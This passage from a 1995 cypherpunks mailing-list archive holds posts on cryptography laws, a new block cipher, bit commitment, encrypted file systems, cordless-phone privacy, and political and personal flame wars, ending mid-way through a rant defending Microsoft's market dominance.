l+OdwwHYH0K7OH1SIRr9nfpZ4IuZ3dsXVTTPl1H8Z3ktv5B4hFziLiIt3WPZTqVu
k4nXVsirfuo=
=X1zb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@mae.engr.ucdavis.edu>
Date: Wed, 20 Dec 95 11:40:53 PST
To: jirib@cs.monash.edu.au
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <199512200022.LAA28002@sweeney.cs.monash.edu.au>
Message-ID: <Pine.HPP.3.91.951220114130.20443B-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 20 Dec 1995, Jiri Baum wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Hello,
> 
> tcmay wrote:
> ...
> > Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
> > has two factors.)

> ...
> 
> Can someone enlighten me as to what the two factors are?
> 

The two factors of a prime number are itself and one.  However, prime 
factoring usually refers to (?) factoring a number out into it's 
component prime numbers.

Tobin Fricke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Dec 95 09:37:17 PST
To: cypherpunks@toad.com
Subject: KOD
Message-ID: <199512201737.MAA29878@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Congratulations to the cypherpunks named Newsweek's "Big 
Thinkers of tomorrow -- the list of 50 People Who Matter Most 
on the Internet." In the December 25 issue.


And, sympathy for the Kiss of Death envynescent celebrity.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 20 Dec 95 12:22:01 PST
To: Alex de Joode <usura@berserk.com>
Subject: Re: CFS and Linux
In-Reply-To: <199512201915.UAA00215@asylum.berserk.com>
Message-ID: <Pine.LNX.3.91.951220124114.4924A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Alex de Joode wrote:

> Date: Wed, 20 Dec 1995 20:15:14 +0100 (MET)
> From: Alex de Joode <usura@berserk.com>
> To: cypherpunks@toad.com
> Subject: CFS and Linux
> 
> 
> Is there anyone out there that has CFS running with Linux ?
> 
> It installs fine on BSDi 2.0 but I'm unable to install it 
> under Linux, I would appreciate it if some one would help
> me out.


i don't think i can help you at all but i do have it running on my linux 
box.  i compiled it as ELF with gcc 2.7.0 and libc 5.0.9.  unfortunately, 
i just tried to compile it again and it didn't work.  i'm not sure what 
i've changed since then but i have updated some libraries and bin-utils 
so who knows.

anyway, i know other people have it running too, it just seems really 
touchy to me.

sorry for the lack of info/help,

-pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Dec 95 13:47:54 PST
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program [NOISE]
Message-ID: <199512202147.NAA00522@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Phill <hallam@w3.org> wrote:
>>It is not simply an issue of money, it is an issue of national security. If a 
>>foreigner were to control the majority of the media there would be a
significant 
>>threat to the national interest. This threat has been realised in the UK with 
>>the comming to power of Rupert Murdoch. Fortunately his influence on the US 
>>political scene has thus far been minor. In his own country he has brought
down 
>>the government more than once.

At 01:37 AM 12/20/95 -0500, Jim Ray wrote:
>So what??? He gives us "The Simpsons" and "Married, With Children!"
>[IMO] Rupert has done more for humor than any humor-impaired liberal
>has ever done!

Murdoch is bitterly hated by our elites, because things are speakable on
his networks that are unspeakable on other networks.

Hence their perfectly true claim that he has overthrown several 
governments.

I hope he overthrows some more.

I especially love the political humor on "married with children"

Cypherpunk relevance:  Murdoch got in deep shit because of his famous
speech that the communication revolution would profoundly undermine
the power of oppressive governments.

Murdoch sometimes calls himself a libertarian, but he is more a conservative
with bombs.  Still, I am strongly in favor of bombs.   It seems clear to
me that Murdoch, whatever his political beliefs may be, has done much
for liberty.  He has been a powerful disruptive influence.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 20 Dec 95 11:37:37 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512201858.NAA28293@jekyll.piermont.com>
Message-ID: <Pine.OSF.3.91.951220133424.7053C-100000@abernathy.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Perry,

the only crypto code you seem to do is the unintelligble postings
that you send to the list.

.d

On Wed, 20 Dec 1995, Perry E. Metzger wrote:

> 
> Dan Harmon writes:
> > If this is what you consider contributing them you seem to have some
> > deep problems that cannot be solved here. You may have to seek professional 
> > help. Your continued and at times seemingly uncontrollable use of vulgar 
> > language may indicate a neurobiological disorder such as Tourette's 
> > syndrome.  You really should have it checked out before you harm yourself 
> > and possibily others.
> 
> Thank you for the pseudopsychology, but really, all you've done is
> further confirm my diagnosis of "non-contributing asshole".
> 
> When was the last time you did anything to actually help spread
> cryptography, eh?
> 
> If you'll pardon me, I have crypto code to get back to.
> 
> .pm
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 20 Dec 95 13:46:32 PST
To: cypherpunks@toad.com
Subject: Text version of Cyphernomicon
Message-ID: <199512202145.NAA05944@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ftp.goblin.punk.net/pub/docs/cypherfq.zip  or   cypherpunk.faq.gz
- -- 
Jeff Simmons                           jsimmons@goblin.punk.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNiECeL8IP70uJJBAQGiRQQAlIXYZkpMy4OSD+2DNgSEdGRsFaPgEk6/
vckQsT8Wa3Kl1uhIvFo/c/FDnbH/1W+LtzfV28zve6UkauSdhe6kD4S6QI7itbRa
PgbOgLEsFh9WxFOgTANozPQdumj1gnj/qoKxGKb5hBTT4O0jaPvA5bZY9LtPtl2E
UjGdr5ap0Mo=
=Kd54
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Wed, 20 Dec 95 14:19:36 PST
To: cypherpunks@toad.com
Subject: 900mhz digital phones - how much to trust ?
Message-ID: <199512202219.OAA26567@software.net>
MIME-Version: 1.0
Content-Type: text/plain



Whats the current thinking on the security level of 900Mhz digital spread
sectrum cordless phones? Clearly it's not a basic scanner job but how much
more equipment is needed to monitor one ?
John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065

Favorite quote: "Security is mostly a superstition. It does not 
exist in nature, nor do the children of man as a whole experience
it. Avoiding danger is no safer in the long run than outright
exposure. Life is either a daring adventure, or nothing." -  Helen Keller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Wed, 20 Dec 95 11:34:36 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
Message-ID: <2.2b9.32.19951220193213.006bd414@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:14 AM 12/20/95 EST, Dr. Dimitri Vulis wrote:
...
>> Matt, if you're getting paid to read this list, I want a new contract.
>
>Karl, are you an unpaid volunteer at AT&T, or do you quit your job every
>time you read your e-mail?

Actually, AT&T has us record our time down to 15 minute intervals, which I
obey religiously*. In this case, I'm writing my CP activity off to "People
who can't see a joke without a :-)."

* Note there should be a :-) here, too.

Not speaking for the company...

					Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: visentin@imdwd01.milano.italtel.it
Date: Wed, 20 Dec 95 05:35:17 PST
To: cypherpunks@toad.com
Subject: Which countries don't allow encryption ?
Message-ID: <9512201335.AA01573@imdwd01>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

Apologies in advance if anyone feels this is off topic...

I'm trying to address the following issue: people at
my company need to exchange sensitive information with
their colleagues abroad (e.g. East Europe, or Southern
America).

Of course, the most obvious way to protect our data
is to encrypt everything, regardless how we communicate
(either via e-mail or sending magnetic media).
So we should use PGPi, but...it seems to me there
is a _problem_.

I read somewhere that Russian law forbids the use on
encryption: is this correct ?

Let me generalize this first question: which countries
in the world don't allow encryption usage, or encrypted
traffic inside their boundaries ?  or allow, but provided
certain conditions are satisfied ?

2nd question: which way(s) could we meet the laws in, let
me say, East Europe while protecting our info ?
(I'd like to avoid giving away our keys, as I'd requested
-possibly- in France, so maybe encryption is not suitable).

Please e-mail directly to me, since I'm not a subscriber
of this list (I tried it, but it is a too high volume and
specialization level for me).

Thanks in advance,

Franco Visentin
( visentin@milano.italtel.it )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Dec 95 14:56:58 PST
To: dmandl@bear.com (David Mandl)
Subject: Re: KOD
In-Reply-To: <Pine.SUN.3.91.951220160232.4338q-100000@goya>
Message-ID: <199512202251.OAA27128@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Rumor has it that I was listed there ...
I haven't seen it though.

> 
> On Wed, 20 Dec 1995, John Young wrote:
> 
> > Congratulations to the cypherpunks named Newsweek's "Big 
> > Thinkers of tomorrow -- the list of 50 People Who Matter Most 
> > on the Internet." In the December 25 issue.
> 
> Can you reveal who they are?  No way am I going to buy Newsweek to
> find out.
> 
>    --Dave.
> 
> --
> David Mandl
> Bear, Stearns & Co. Inc.
> Phone: (212) 272-3888
> Email: dmandl@bear.com
> 
> --
> *******************************************************************************
> Bear Stearns is not responsible for any recommendation, solicitation, offer or
> agreement or any information about any transaction, customer account or account
> activity contained in this communication.
> *******************************************************************************
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Wed, 20 Dec 95 11:52:20 PST
To: dan@milliways.org
Subject: Re: Motorola Secure Phone
Message-ID: <9512201951.AA25492@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain



>I saw a new cordless phone made by Motorola in a retail outlet today
>that is supposedly "Secure from eavesdroppers."  I asked the
>salespeople for more technical info, but they weren't very helpful. 
>Does anyone have any information on this?

I have one of these, it's a good phone.  I think the security will
stop only an off-the shelf scanner.  My understanding is that the
signal is not encrypted, but only phase-inverted or otherwise shifted.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 20 Dec 95 15:03:30 PST
To: cypherpunks@toad.com
Subject: Please cut the "tude"!
Message-ID: <199512202303.PAA02038@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


The "tude" level is getting a bit out of hand.

Please take your personal attacks elsewhere.

Moderator, please beat them silly with a banana
until they stop!

Thanks!

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 20 Dec 95 06:16:23 PST
To: cypherpunks@toad.com
Subject: Re: Which countries don't allow encryption ?
Message-ID: <1DBA4168EA@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Let me generalize this first question: which countries
> in the world don't allow encryption usage, or encrypted
> traffic inside their boundaries ?  or allow, but provided
> certain conditions are satisfied ?

See my Crypto Law Survey.

NOTE: the URL has changed. Please reset your pointers to:

http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.html

I shall update it in the first week of January and provide some more 
pointers to online information.

Regards,
Bert-Jaap

----------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law and Informatization      facs    +31 13 466 8102
Tilburg University                      e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://www.kub.nl:2080/FRW/CRI/people/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Dec 95 12:27:31 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <Pine.OSF.3.91.951220141503.17633B-100000@beall.tenet.edu>
Message-ID: <199512202027.PAA28498@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Harmon writes:
> Perry, If my memory is correct, you are the one who has a history of being
> a jerk.

You know, Mr. Harmon, you can just keep posting my private mail to you
all day, but you WILL start to annoy others after a while.

[Just to be clear to others, this is the first of the several messages
on the topic I've posted -- Mr. Harmon has been forwarding my private
replies to the list. I think it all makes him look bad, but some
people have no sense.]

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Wed, 20 Dec 95 15:48:44 PST
To: cypherpunks@toad.com
Subject: Ruby Block Cipher
Message-ID: <Pine.SUN.3.91.951220154441.5757B-100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



The Ruby Block Cipher has just been published.  It is not a general block
cipher in that it cannot be used in Electronic Codebook (ECB) mode.  It is
more like a cryptographic hash function with a block size of only 64 bits. Of
course, 64 bits is too short for a cryptographic hash function intended for
digital signature use, but it is just fine for a quick block cipher.

This may be a good reference for those folks who want a quick & easy
encryption algorithm that need not withstand nuclear attack but can provide
something better than common weak encryption methods in use in the software
industry.

Your comments and suggestions on this rather strange little cipher are
welcome.

Information on the Ruby Block Cipher is available as

ftp://ftp.csn.net/mpj/public/ruby_m4.ps

and, if you are in the USA or Canada, a reference implementation is in

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/mpj/rubycode.zip
where the ??????? is revealed in
ftp://ftp.csn.net/mpj/README

rubycode.zip is also available on the Colorado Catacombs BBS at 303-772-1062.

Note: this is not a product for sale (it is free and probably worth at least
as much as you pay for it).  It is also not a prepublication (it is THE
publication in electronic form with no paper publication anticpated in the
near future).

                  ___________________________________________________________
                 |                                                           |
 |\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
 | \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
 |    | | /  _   | mpj@csn.net aka mpj@netcom.com m.p.johnson@ieee.org       |
 |    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
 |    |||\  (    | http://www.csn.net/~mpj                 -. --- ----- .... |
 |    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                 |___________________________________________________________|


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAgUBMNiaP/X0zg8FAL9FAQHe0AP+N+tBxoaIdny3CEgxdA8LO9+5VyYiOety
qYBc9aCrCbw4TpsFTcsg5bosPlkm3H+VwpWVGOshfl5p69J893jrma07xRamEvM0
/1Mro3X/Ga4SQ7rjHPSdPCBR3YxSA7UoIx27gldTBty2k8WAAeH0BTbn/5s1bGrf
ej9ab/rd7Jc=
=QRjc
-----END PGP SIGNATURE-----
P. S. -- I don't normally read this list, so please send a copy of 
follow-ups directly to me.  Thanks!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Wed, 20 Dec 95 13:05:11 PST
To: John Young <jya@pipeline.com>
Subject: Re: KOD
In-Reply-To: <199512201737.MAA29878@pipe6.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.951220160232.4338q-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, John Young wrote:

> Congratulations to the cypherpunks named Newsweek's "Big 
> Thinkers of tomorrow -- the list of 50 People Who Matter Most 
> on the Internet." In the December 25 issue.

Can you reveal who they are?  No way am I going to buy Newsweek to
find out.

   --Dave.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Dec 95 13:18:16 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <199512202117.QAA28656@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



ECafe Anonymous Remailer writes:
> I'm not trying to start a flame war.

Really?

> They aren't cypherpunks.
> 
> Neither has come out against GAK.

You obviously have never spoken to Matt.

> Blaze even does "research" on GAK.

No, he does research on private escrow. Thats not the same thing as
GAK. Private escrow is sensible -- you don't want just one person with
the keys to, say, the personel records. What happens if they get hit
by a car?

> DO THEY HAVE YOU ALL SO IMPRESSED WITH THEIR MASTERS DEGREES THAT
> YOUR AFRAID TO LOOK CLOSELY?

Actually, Matt has a Ph.D. from Princeton.

> WHY IS EVERYONE SO QUICK TO DEFEND THESE PEOPLE?

Maybe I defend Matt because I think I know him pretty well -- we met
when he showed up at the Columbia U. computer science department in
the mid 1980s, and among other things we shared an office at Bellcore
for a year or two, and he's about as cryptography and privacy friendly
a person as you can find.

Maybe I defend him because you are likely an idiot who's never so much
as chatted with him.

Maybe I'm bored.

Who knows.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 20 Dec 95 07:53:44 PST
To: cypherpunks@toad.com
Subject: Correct URL Crypto Law Survey
Message-ID: <1F59210729@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


>http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.html
 
Sorry, the URL should be: 

http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.htm

Bert-Jaap.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robbie Gates <gates_r@maths.su.oz.au>
Date: Tue, 19 Dec 95 22:10:10 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Bit Commitment Query
Message-ID: <30D7A993.3F54@maths.su.oz.au>
MIME-Version: 1.0
Content-Type: text/plain


I am confused about bit commitment via one way hashing as described
in Schneier (1st ed, p 73)

h is a one way hash function.  This description from Schneier, except
that variables are changed so i don't need subscripts:

1. Alice has a bit b she wants to commit to. She picks random bit
	strings R and S, and sends Bob h(R,S,b),R

2. To verify commitment, she tells Bob S and b so he can verify the hash.

What i don't get is Schneier's claim:
``If Alice didn't send Bob R, then she could change the value of S
and then the value of the bit. The fact that Bob already knows R prevents
her from doing this.''

Can someone explain exactly how Alice cheats if Bob doesn't know R.
I can't see how she can alter R and S and b at all without being
able to produce hash collisions.

In essence, why doesn't the following work:

1. Alice has a bit b.  She picks a random bit string R and sends Bob
	h(R,b)

2. To verify, she tells Bob R and b.

Assuming Bob knows b is a single bit, how does Alice cheat without needing
to produce hash collisions for h.

thanks in advance for any help,
 - robbie
-- 
----------------------------------------------------------------------
      robbie gates      | it's not a religion, it's just a technique.
  apprentice algebraist |    it's just a way of making you speak.
    pgp key available   |       - "destination", the church.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Dec 95 14:23:30 PST
To: cypherpunks@toad.com
Subject: DCI_kgb
Message-ID: <199512202222.RAA09658@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The 12-20-95 WPost reports the Deutch/Perry move to
   kremlinize finance of the 13 spy agencies under the DCI 
   -- to transform the "vaguely associated medieval guilds 
   into a modern corporate team" -- and palmly slather $29 
   billion IC grease:

      National Forward Intelligence Program (CIA, NSA, DIA,
      NRO, parts of three G2s, DOE and FBI): $16bn.

      Tactical and Related Activities (warfighting support):
      $10bn.

      Joint Military Intelligence (cryptology, aerial recon,
      counter-narc and mapping): "Several billion."


   DCI_kgb (6 kgb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net (Jason Rentz)
Date: Wed, 20 Dec 95 15:18:01 PST
To: cypherpunks@toad.com
Subject: ex encrypted script
Message-ID: <199512202339.RAA05220@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Forgive me if this is a stupid question.

I'm using AT&T unix Version 5 release 3.2.2  ( UNIX System V/386 Release 3.2)

I have several simple scripts that are simple yet handle important realtime
call proccessing tasks and remote control operations.  These programs are my
programs but are running on a system that is dialed into by the vendor once
in a while.  

Is there a way to encrypt a script yet still allow it to be runnable?  I
know that the simple answer is to write it in C and compile it but I don't
have the means of doing that at the moment.  (i.e. there is not compiler on
the system)

I thought of a few simple protections but they all involve decrypting before
running.

                                Dr0id


( Computer Consulting & Management   )
(P.O. Box 421  Cambria, IL 62915-0421)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i
d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1
dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw
hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y
jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL
DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx
Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs
LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK
NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63
NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u
LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz
DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o
wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA=
=SgPT
-----END PGP PUBLIC KEY BLOCK-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 20 Dec 95 17:44:09 PST
To: cypherpunks@toad.com
Subject: Re: FTC Privacy Initiative (fwd)
Message-ID: <9512210144.AA04101@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Jyri Kaljundi 

From: Internet Marketing Discussion List

        The US Federal Trade Commission has launched a "Privacy Initiative"
to investigate whether the information collected at websites (either that
affirmatively submitted by a visitor via a form or information collected
based upon a visitor's selection of pages at a site to reflect personal
interests) should be the subject of regulation by the FTC.  
...............................................

	"Hey, we can't just stand around here with nothing to do.
	Give us something to regulate - anything, pro or con; we
	must regulate something."

Dang!

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Dec 95 14:58:22 PST
To: cypherpunks@toad.com
Subject: Re: KOD
Message-ID: <199512202258.RAA13656@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by dmandl@bear.com (David Mandl) on Wed, 20 
Dec  4:3  PM

>Can you reveal who they are?  No way am I going to buy 
>Newsweek to  find out.


Anyone out of Newsweek's range, return this msg, empty, to me 
to get the 50 mugshots, then ... sort out the living from the 
dead.


Best not to cypherdunk the already nym-shot victims. Privacy is 
paramount, bellows this list, no?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Dec 95 18:08:21 PST
To: attila <attila@primenet.com>
Subject: Re: on web standards: sent to Markoff
In-Reply-To: <Pine.BSD.3.91.951220193251.5597F-100000@usr5.primenet.com>
Message-ID: <199512210204.SAA26757@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


there's been MS flamewars on this list before, but Attila repeats
various snippets that I find highly objectionable.

cpunk relevance: operation of the free market

Gates' conquests can either be made out to be a failure of the free enterprise 
system or a success from it. the more I read whining complaints about MS's
dominance, the more I prefer the latter interpretation. perhaps power 
corrupts, but on the other hand failure clearly promotes whining. "you cannot
grow taller by chopping off the heads of others". 

I've seen so many people try to smear MS with innuendo, as if "enough people
being unhappy" at a company is ample evidence that there is "unfairness".
the marketplace is *not* fair. it rewards people who are in tune with it
disproportionately!! sometimes, *dramatically*so* as in the case with Gates.

consider this anecdote. 

a market for [x] gizmos does not even exist. a brilliant
person says, " I think people really need [x] gizmos. I'm going to make and
sell them. I'm going to find people who will help me, but if I can't find any
I'm going to do it all myself".

Gates is such a person and did it with PC OS'es and various windows 
applications (Excel, Word Perfect, etc.). he bet his entire future on
the idea that he knew what people wanted even when other companies disagreed.
 all companies had a chance to get on the windows bandwagon
and write decent software when he created this OS-- he was going around
and virtually begging companies. what did they say? "no, we aren't going
to take our chance with you. we don't think people really want your
@#$$%^&* gizmos". they snickered and sneered at him.

Gates succeeds, and sells a bazillion gizmos. he *creates* a market that
was not even in existence. or rather, he anticipates what people really
want, and the related markets begins to respond to him in a "positive 
feedback loop".

suddenly all these companies cry foul in the greatest of hypocrisy. "Gates
has cornered the gizmo market!! he has 95% of it!!! why weren't we notified!!
no one should have such power!!"

the truth is that the playing field has always been level, but because Gates
is  such a brilliant genius, market anticipator, and gizmo producer, he
succeeds far beyond his or anyone else's wildest dreams.

"well, all things should be equal in the competition, unless someone is
succeeding more than somebody else, in which case we should penalize them
to make things more even" say his competitors.

the market has *given* bill gates his dominance. all the arguments about
him being "unfair" are absolutely bogus that I have seen. they amount to,
"Bill Gates is using tactics to sell more of his software than his competitors.
therefore, he's not being fair to everyone else who wants to sell their
software as well."

 hee, hee. I really love the free market. it's a delight
that Gates has put his money where his brain is, and in only 20 years built
one of the most successful companies in the entire history of business.
it's a tribute to the intelligence of the market and people who have the
sense to listen to it. MS has gained its dominance through the utmost of
hard work, and consuers vote with their $$$. whoever denies that consumers
know what they *really* want is an awfully pretentious and deluded person,
IMHO.

>The conundrum is trying to decide "when" a particular company is a 
>monopoly by either the classic definition of the Sherman and Clayton Acts 
>or an effective monopoly, or "bad" player as defined in the 
>Robinson-Patman act. 

pioneers are the ones with the arrows in their back. when they fail,
everyone sneers at them. when they succeed, everyone sneers at them and
says they succeeded through skullduggery. and then competitors refer to 
this *market* they had no hand in *creating* (the *hard* work is creating
a market, *anyone* can capitalize on one once created) as if they have
some "right" to it. 

Gates is the biggest teddybear
on the planet. those who are afraid of him only show they are afraid to
think as focused and seriously as he does all day. "gosh, we shouldn't have
to compete against someone who understands the market so well. what about
us? we are competition challenged!! we need a level playing field."

>    Bill Gates more than satisfies the requirements of defining a monopoly
>in Sherman and Clayton with 85% of the desktop locked in and an assualt
>with "almost" standards on the open-system server market. NT is already
>garnering more than 25% of server installations in business --big
>business, since it will be "guaranteed" compatible with their desktop 95s. 
>The rest of us, stay with the real thing.

"no fair!!! Bill Gates has a monopoly on the gizmo market!!! he should be
stopped!!! restrained!! otherwise, no other gizmo companies will succeed!!"
you have a very short memory. only several years ago most of the population
of the planet was in total skepticism about the success of windows. now
that it has succeeded, everyone believes that this market should be carved
up to everyone that wants a piece of the pie. well, Gates helped "create" the
pie in the first place. 

>   Add to MS' virtually absolute domination of the desktop and its 
>impending domination of the commercial servers the fact that MS has 95% 
>of the front line office products --WP, Spreadsheet, Database, and mail 
>with the last be non-standard to long established rules and you do have a 
>problem to be considered. 

is anyone twisting people's arms to buy his software? are there a lack of
choices because other companies are simply choosing not to compete with
MS? if MS is giving customers what they want better than anyone else, (which
is proven viscerally by *cash*, people invariably put their money where
their mouths are) why is this "a problem to be considered"?

>  Will the market correct itself?

why is MS dominance require "correction"? the fact that you consider it
an anomaly shows how naive and ridiculous your position is. MS dominance
is absolutely no accident, and anyone who claims it was achieved through
anything less than honest competition is in my opinion a whining nonthinker
who is afraid of a true, free market realized.

>  Very questionable since MS rode to 
>its position on IBM's back and capitalized on IBM's failure to recognize 
>what they had stumbled into.

beautiful, isn't it? one man can "capitalize" on the idiocy of others. oh,
poor IBM. they didn't *get*it* even after half a decade, perhaps an entire
